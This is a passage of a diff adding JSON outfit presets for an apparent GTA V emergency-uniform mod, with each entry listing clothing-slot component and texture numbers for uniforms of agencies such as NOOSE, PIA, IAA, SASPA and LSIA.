+"Parachute": "62:7" + }, + { +"Name": "Male NOOSE SEP Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:16", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "87:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "31:1", +"Parachute": "21:1" + }, + { +"Name": "Male NOOSE SEP Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:16", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "87:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "31:1", +"Parachute": "21:1" + }, + { +"Name": "Male NOOSE SEP Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "136:18", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "150:4", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "87:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "29:6", +"Parachute": "57:5" + }, + { +"Name": "Male NOOSE SEP Riot Gear", +"Gender": "Male", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "151:1", +"Glasses": "27:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "123:1", +"Top": "151:7", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "126:7", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "31:1", +"Parachute": "21:1" + }, + { +"Name": "Female NOOSE SEP Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:16", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "90:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "35:1", +"Parachute": "21:1" + }, + { +"Name": "Female NOOSE SEP Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:16", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "90:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "35:1", +"Parachute": "21:1" + }, + { +"Name": "Female NOOSE SEP Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "135:18", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "147:4", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "90:13", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:6", +"Parachute": "62:5" + }, + { +"Name": "Female NOOSE SEP Riot Gear", +"Gender": "Female", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "150:1", +"Glasses": "24:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "123:1", +"Top": "148:7", +"UpperSkin": "216:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "132:8", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "35:1", +"Parachute": "21:1" + }, + { +"Name": "Male SEP TRU Uniform", +"Gender": "Male", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "40:2", +"Glasses": "27:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "123:1", +"Top": "221:10", +"UpperSkin": "142:20", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "38:3", +"Shoes": "26:1", +"Accessories": "111:1", +"Armor": "26:6", +"Parachute": "49:1" + }, + { +"Name": "Female SEP TRU Uniform", +"Gender": "Female", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "39:2", +"Glasses": "29:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "123:1", +"Top": "231:10", +"UpperSkin": "175:20", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "37:3", +"Shoes": "26:1", +"Accessories": "82:1", +"Armor": "28:6", +"Parachute": "49:1" + }, + { +"Name": "Male Juggernaut", +"Gender": "Male", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "94:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "53:1", +"Top": "187:1", +"UpperSkin": "111:4", +"Decal": "1:1", +"UnderCoat": "98:1", +"Pants": "85:1", +"Shoes": "14:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Juggernaut", +"Gender": "Female", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "93:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "53:1", +"Top": "189:1", +"UpperSkin": "128:4", +"Decal": "1:1", +"UnderCoat": "106:1", +"Pants": "87:1", +"Shoes": "35:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male PIA Suit", +"Gender": "Male", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "5:5", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "180:1", +"Pants": "11:5", +"Shoes": "11:1", +"Accessories": "14:1", +"Armor": "44:1", +"Parachute": "69:1" + }, + { +"Name": "Female PIA Suit", +"Gender": "Female", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "25:4", +"UpperSkin": "8:1", +"Decal": "1:1", +"UnderCoat": "40:3", +"Pants": "4:5", +"Shoes": "30:1", +"Accessories": "1:1", +"Armor": "46:1", +"Parachute": "69:1" + }, + { +"Name": "Male PIA Special Agent", +"Gender": "Male", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "349:1", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "11:5", +"Shoes": "11:1", +"Accessories": "7:1", +"Armor": "44:1", +"Parachute": "1:1" + }, + { +"Name": "Female PIA Special Agent", +"Gender": "Female", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "28:2", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "4:5", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "46:1", +"Parachute": "1:1" + }, + { +"Name": "Male PIA Field Agent", +"Gender": "Male", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "312:3", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "48:1", +"Shoes": "26:1", +"Accessories": "7:1", +"Armor": "44:1", +"Parachute": "49:1" + }, + { +"Name": "Female PIA Field Agent", +"Gender": "Female", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "336:3", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "55:4", +"Shoes": "25:1", +"Accessories": "7:1", +"Armor": "46:1", +"Parachute": "1:1" + }, + { +"Name": "Male PIA Windbreaker", +"Gender": "Male", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "326:6", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "29:4", +"Pants": "48:1", +"Shoes": "26:1", +"Accessories": "7:1", +"Armor": "44:1", +"Parachute": "1:1" + }, + { +"Name": "Female PIA Windbreaker", +"Gender": "Female", +"Category": "EUP", +"Category2": "NOOSE", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "319:6", +"UpperSkin": "8:1", +"Decal": "1:1", +"UnderCoat": "105:3", +"Pants": "4:5", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "46:1", +"Parachute": "29:4" + }, + { +"Name": "Male IAA Field Agent", +"Gender": "Male", +"Category": "EUP", +"Category2": "IAA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "243:1", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "11:4", +"Shoes": "11:1", +"Accessories": "7:1", +"Armor": "23:9", +"Parachute": "1:1" + }, + { +"Name": "Female IAA Field Agent", +"Gender": "Female", +"Category": "EUP", +"Category2": "IAA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "15:2", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "10:1", +"Pants": "4:2", +"Shoes": "51:1", +"Accessories": "99:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male IAA Agent", +"Gender": "Male", +"Category": "EUP", +"Category2": "IAA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "349:5", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "17:1", +"Pants": "11:3", +"Shoes": "11:1", +"Accessories": "1:1", +"Armor": "23:9", +"Parachute": "1:1" + }, + { +"Name": "Male IAA Suit", +"Gender": "Male", +"Category": "EUP", +"Category2": "IAA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "5:1", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "180:2", +"Pants": "11:1", +"Shoes": "11:1", +"Accessories": "14:1", +"Armor": "23:9", +"Parachute": "1:1" + }, + { +"Name": "Female IAA Suit", +"Gender": "Female", +"Category": "EUP", +"Category2": "IAA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "25:2", +"UpperSkin": "8:1", +"Decal": "1:1", +"UnderCoat": "105:5", +"Pants": "4:2", +"Shoes": "51:1", +"Accessories": "1:1", +"Armor": "25:9", +"Parachute": "69:1" + }, + { +"Name": "Male USAF SF Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "USAF Security Forces", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:22", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "87:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "67:1" + }, + { +"Name": "Male USAF SF Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "USAF Security Forces", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:22", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "87:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "66:16" + }, + { +"Name": "Male USAF SF Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "USAF Security Forces", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:22", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "87:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "66:16" + }, + { +"Name": "Male USAF SF Fatigues", +"Gender": "Male", +"Category": "EUP", +"Category2": "USAF Security Forces", +"Hat": "29:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "64:1", +"UpperSkin": "1:1", +"Decal": "22:1", +"UnderCoat": "56:1", +"Pants": "88:1", +"Shoes": "36:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male USAF Combat Fatigues", +"Gender": "Male", +"Category": "EUP", +"Category2": "USAF Security Forces", +"Hat": "29:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "122:1", +"Top": "221:14", +"UpperSkin": "155:20", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "88:1", +"Shoes": "36:1", +"Accessories": "9:1", +"Armor": "8:1", +"Parachute": "21:1" + }, + { +"Name": "Female USAF Police", +"Gender": "Female", +"Category": "EUP", +"Category2": "USAF Security Forces", +"Hat": "29:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "57:1", +"UpperSkin": "15:1", +"Decal": "21:1", +"UnderCoat": "33:1", +"Pants": "91:1", +"Shoes": "37:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female USAF SF Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "USAF Security Forces", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:22", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "67:1" + }, + { +"Name": "Female USAF SF Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "USAF Security Forces", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:22", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "67:1" + }, + { +"Name": "Female USAF SF Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "USAF Security Forces", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:22", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "67:1" + }, + { +"Name": "Male SASPA Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:10", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "155:1", +"Pants": "26:3", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "34:1" + }, + { +"Name": "Male SASPA Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:10", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "46:1", +"Pants": "87:11", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "34:1" + }, + { +"Name": "Male SASPA Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:10", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "46:1", +"Pants": "87:11", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "34:1" + }, + { +"Name": "Male SASPA Polo", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "140:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "312:9", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "46:1", +"Pants": "87:11", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "15:1", +"Parachute": "49:1" + }, + { +"Name": "Male SASPA Armed Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:10", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "87:11", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "21:9", +"Parachute": "49:1" + }, + { +"Name": "Male SASPA Armed Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:10", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "87:11", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "21:9", +"Parachute": "49:1" + }, + { +"Name": "Male SASPA Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "140:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "150:2", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "87:11", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:3", +"Parachute": "57:8" + }, + { +"Name": "Male SASPA Jumpsuit", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "210:3", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "40:1", +"Pants": "88:11", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "66:6" + }, + { +"Name": "Male SASPA CRT", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "126:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "53:1", +"Top": "151:1", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "40:1", +"Pants": "126:6", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "6:1", +"Parachute": "49:1" + }, + { +"Name": "Female SASPA Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:10", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "191:1", +"Pants": "42:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "34:1" + }, + { +"Name": "Female SASPA Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:10", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "90:11", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "15:1", +"Parachute": "34:1" + }, + { +"Name": "Female SASPA Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:10", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "90:11", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "15:1", +"Parachute": "34:1" + }, + { +"Name": "Female SASPA Polo", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "139:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "336:9", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "90:11", +"Shoes": "26:1", +"Accessories": "1:1", +"Armor": "17:1", +"Parachute": "49:1" + }, + { +"Name": "Female SASPA Armed Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:10", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "52:2", +"Pants": "90:11", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "24:9", +"Parachute": "34:1" + }, + { +"Name": "Female SASPA Armed Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:10", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "52:2", +"Pants": "90:11", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "24:9", +"Parachute": "34:1" + }, + { +"Name": "Female SASPA Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "147:2", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "52:2", +"Pants": "90:11", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:3", +"Parachute": "62:8" + }, + { +"Name": "Female SASPA Jumpsuit", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "226:3", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "4:1", +"Pants": "91:11", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "66:6" + }, + { +"Name": "Female SASPA CRT", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASPA", +"Hat": "125:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "53:1", +"Top": "148:1", +"UpperSkin": "216:1", +"Decal": "1:1", +"UnderCoat": "4:1", +"Pants": "132:3", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "4:1", +"Parachute": "1:1" + }, + { +"Name": "Male LSIA Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:8", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "32:1" + }, + { +"Name": "Male LSIA Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:8", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "32:1" + }, + { +"Name": "Male LSIA Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:8", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "32:1" + }, + { +"Name": "Male LSIA Polo", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "312:15", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:13", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSIA Utility Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "210:9", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:3", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "66:10" + }, + { +"Name": "Male LSIA Utility Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "213:9", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:3", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "66:10" + }, + { +"Name": "Male LSIA ESU Utility", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "210:10", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:13", +"Shoes": "52:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "66:11" + }, + { +"Name": "Female LSIA Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:8", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "32:1" + }, + { +"Name": "Female LSIA Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:8", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "32:1" + }, + { +"Name": "Female LSIA Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:8", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "34:2", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "32:1" + }, + { +"Name": "Female LSIA Utility Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "226:9", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:3", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "16:1", +"Parachute": "66:10" + }, + { +"Name": "Female LSIA Utility Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "227:9", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:3", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "16:1", +"Parachute": "66:10" + }, + { +"Name": "Female LSIA ESU Utility", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "226:10", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:13", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "16:1", +"Parachute": "66:11" + }, + { +"Name": "Female LSIA Polo", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "336:15", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "90:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSIA Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "53:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSIA Raincoat", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "188:8", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "57:2", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:1", +"Parachute": "32:1" + }, + { +"Name": "Female LSIA Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSIA", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "176:1", +"UpperSkin": "4:1", +"Decal": "1:1", 